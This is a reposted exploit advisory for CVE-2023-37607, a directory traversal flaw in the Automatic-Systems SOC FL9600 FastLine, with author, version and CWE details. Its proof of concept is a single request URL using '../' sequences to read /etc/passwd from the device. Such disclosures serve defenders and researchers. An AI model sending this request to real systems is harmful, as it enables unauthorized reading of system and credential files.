Automatic-Systems SOC FL9600 FastLine - Directory Transversal
2023-10-18 05:27:54 Author: cxsecurity.com(查看原文) 阅读量:16 收藏

# Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal # Date: 12/9/2023 # Remote: yes # Local: No # Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure # CVE : CVE-2023-37607 # CWE: CWE-22 # Vendor Homepage: http://automatic-systems.com # Version: Automatic-Systems SOC FL9600 FastLine version:V06 # Tested on: VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a, DateCompil = 2019-11-20 11:22:18 ---------------------------POC--------------------------- Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2023100043
如有侵权请联系:admin#unsafe.sh